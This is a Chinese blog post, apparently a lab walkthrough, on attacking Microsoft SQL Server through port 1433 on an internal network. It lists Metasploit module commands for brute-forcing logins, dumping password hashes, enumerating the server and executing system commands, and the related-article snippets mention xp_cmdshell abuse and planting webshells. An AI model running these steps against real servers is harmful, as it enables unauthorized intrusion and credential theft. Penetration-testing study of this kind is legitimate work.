mysql 1433端口映射_内网渗透-1433端口渗透过程

最新推荐文章于 2024-05-10 05:30:49 发布
最新推荐文章于 2024-05-10 05:30:49 发布
阅读量1k 收藏 9
点赞数 1
文章标签: mysql 1433端口映射
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39624716/article/details/113904868
版权

1.在内网环境中收集开放1433端口的服务器:

2.针对开放1433端口的服务器开始渗透:

2.1利用msf 爆破1433端口:192.168.10.251

(1)use auxiliary/scanner/mssql/mssql_login

(2)set RHOSTS 192.168.109.139

(3)set USER_FILE /home/xh/shentou/usr_mysql.txt

(4)set PASS_FILE /home/xh/shentou/pwd_mysql.txt

(5)run

f6f5c270617c2fc415c08c9cbb7b903d.png

2.2查找/捕获服务器的口令

(1)use auxiliary/scanner/mssql/mssql_hashdump

(2)set RHOSTS 192.168.10.251

(3)set PASSWORD 123456

(4)run

86917d017362d07d72a053cb19c2a493.png 

2.3浏览MSSQL

(1)use auxiliary/admin/mssql/mssql_enum

(2)set RHOSTS 192.168.10.236

(3)set PASSWORD 123456

(4)run

41993603f5bc4f97ec0e79b0d1eb1e2b.png

2.4重新载入xp_cmd功能

(1)use auxiliary/admin/mssql/mssql_exec

(2)set CMD 'ipconfig'

(3)set RHOSTS 192.168.10.251

(4)set PASSWORD 123456

(5)run

3e859f7dd11ba88295d023111d536c54.png

3.后面是利用SA用户进行系统提权,目前还没有操作,待续 ......

weixin_39624716
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
1433端口映射 架设sql server [经典]
gxj022的专栏
03-12 1988
1433端口映射 架设sql server 【转】 http://blog.csdn.net/lee576/archive/2007/11/12/1880001.aspx 关于通过外网连接内网SQL Server服务器的方法      近日,在论坛上看到的有关SQL Server远程连接的文章后,真的受益良多。一直以来困惑了已久的关于从外网如何连接到内网的SQL Server服务器
mysql 1433端口映射_常见路由器的1433端口映射讲解
weixin_36013428的博客
01-21 1143
实现异地远程连接,服务器电脑如果是通过ADSL+路由器的方式上网,就需要在服务器电脑对路由器中进行相应的端口映射的设置。设置的方法可能会因为路由器不同的品牌和型号,在设置的方法上也会有所不同。我们收集和总结了一些常见ADSL的端口映射的方法,请大家参照相关的型号进行设置。一、中怡数宽sercomm IP505(LT/LM/T) 系列路由器端口映射的设置1.在浏览器中敲入192.168.1.1,用户...
1433端口映射 架设sql server
lee576的专栏
11-12 1万+
关于通过外网连接内网SQL Server服务器的方法      近日,在论坛上看到的有关SQL Server远程连接的文章后,真的受益良多。一直以来困惑了已久的关于从外网如何连接到内网的SQL Server服务器上的方法,现已解决了,相信也有不少象我这样的狐友们。故此,现在把我实现的方法拿出与大家分享一下,小弟很菜,若有不对的地方,请大家纠正,谢谢!操作设置如下:1.在内网里的某一台机上安装好操作
网络安全最新攻击端口渗透剖析_135端口渗透(2),2024年最新卧槽
最新发布
2401_84264096的博客
05-10 1223
1433是SQLServer默认的端口,SQL Server服务使用两个端口:tcp-1433、UDP-1434.其中1433用于供SQLServer对外提供服务,1434用于向请求者返回SQLServer使用了哪些TCP/IP端口1433端口通常遭到黑客的攻击,而且攻击的方式层出不穷。最严重的莫过于远程溢出漏洞了,如由于SQL注射攻击的兴起,各类数据库时刻面临着安全威胁。利用SQL注射技术对数据库进行渗透是目前比较流行的攻击方式,此类技术属于脚本渗透技术。
路由器的1433端口映射讲解
06-17 2406
路由器的1433端口映射讲解   实现异地远程连接,服务器电脑如果是通过ADSL+路由器的方式上网,就需要在服务器电脑对路由器中进行相应的端口映射的设置。设置的方法可能会因为路由器不同的品牌和型号,在设置的方法上也会有所不同。我们收集和总结了一些常见ADSL的端口映射的方法,请大家参照相关的型号进行设置。如果你所使用的路由器不在我们总结的范围之内,请PM给我们,我们会尽快想办法补充上的。 1.
mysql udp提权_SQL Server数据库1433端口解封提权
weixin_29830833的博客
02-17 784
众所周知,1433端口是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。可以利用sa的弱口令,可以通过1433端口进行入侵和提权。为什么要解封?因为数据库管理员为了安全起见,之前对某些敏感文件的权限降低,所以就需要解封...
端口映射软件-编程牛刀
03-21
端口映射就是解决这一问题的方式,通过在公网与内网之间建立通道,将公网请求导向内网特定的服务。 “编程牛刀”中的datapipe.exe是一个非常小巧的端口映射工具,只有4k大小,堪称史上最迷你。这种轻量级的特性使得...
nat123免费注册域名端口映射
12-01
实现外网访问内网WEB网站,外网访问内网ORACLE数据库、SQLSERVER数据库、MYSQL数据库,外网访问内网OA,外网访问内网SVN应用等等端口映射。 还可以免费使用数量不限的自定义域名。 无需公网IP,无需做路由映射,...
nat123免费的端口映射小工具
11-26
nat123免费的端口映射小工具。 外网访问内网WEB网站,外网访问内网ORACLE数据库、SQLSERVER数据库、MYSQL数据库,外网访问内网应用端口等等。...无需要公网IP,无需做路由映射,让外网访问内网nat123端口映射一步搞定。
nat123动态域名解析P2P全端口映射 v1.151123.zip
07-15
at123是集合80端口映射、动态域名解析、域名解析管理的开放自由的平台,可轻松管理域名解析、发布网站、访问内网应用,支持任何网络。 nat123动态域名解析P2P全端口映射软件功能特色: 支持开机运行,自动登录,...
nat123全端口映射P2P域名解析 v1.140826.zip
07-15
nat123是集合80端口映射、动态域名解析、域名解析管理的开放自由的平台,可轻松管理域名解析、发布网站、访问内网应用,支持任何网络。 软件功能特色: 支持开机运行,自动登录,精简模式登录,代理上网,后台服务...
利用1433端口及提权总结
人若有志,就不会在半坡停止。
08-31 1530
1、xp_configure设置 两个 show advanced options,xp_cmdshell 设置为1。--创建一张表yy,只有一个列a,类型为varchar。--创建一张表yy1,只有一个列y,类型为image。要求靶机实际:需要满足以下条件 (很少能满足)l --修改数据库恢复模式为 完整模式。将其加入Administrators组。--把操作日志备份到指定文件。利用xp_cmdshell 建立文件。--插入一句话木马到yy表里。--备份表到指定路径。--插入一句话到yy1表里。...
本地数据库连接另一台电脑的数据库
王梦杰_MengJie
09-21 1万+
比如常用的办公室软件等,一般在办公室或家里,通过拨号上网,这样办公软件只有在本地的局域网之内才能访问,那么问题来了,如果是手机上,或者公司外地的办公人员,如何访问到办公软件呢?如果要用这个办法你需要查看路由器或者光猫的WAN口是否公网IP,但是现在很多运营商分配的Ip都不是公网,需要的话得另外购买。找到SQL Sever网络配置下的MSSQLSEVER协议,启用里面的TCP/IP协议,然后打开 TCP/IP的属性,对于本教程,我们将使用。右击打开本地数据库的属性,找到连接,点击允许远程连接到此服务器,
常见端口漏洞利用总结
lovemine1314的博客
12-07 1375
常见端口漏洞利用总结
1433 1434端口(连接别人数据库用1433端口
热门推荐
lick4050312的专栏
08-14 1万+
什么是1433端口  1433端口,是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。  很多人都说SQL Server配置的时候要把1433端口改变,这样别人就不能很容易地知道使用的什么端口了。可惜,通过微软
SQL Server 端口映射访问方法
杂家怪谈
02-18 1万+
原来一台SQL SERVER服务器在虚拟机内,通过NAT方式连接外网。 先设置1433端口进行访问,发现无法访问。查资料发现SQL SERVER还需要1434 UDP的端口。 于是切换到VirtualBOX对1434端口进行映射,选择UDP方式。遂连接成功
%MYSQL_EXE_PATH% -u %MYSQL_USER% -p%MYSQL_PASSWORD% -h %MYSQL_HOST% -P %MYSQL_PORT% -e "use videodb;"
06-09
这是一个用于连接 MySQL 数据库并切换到名为 "videodb" 的数据库的...是 MySQL 数据库的端口号。"-e" 参数表示执行指定的 SQL 语句。在本命令中,执行的 SQL 语句为 "use videodb;",即切换到名为 "videodb" 的数据库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值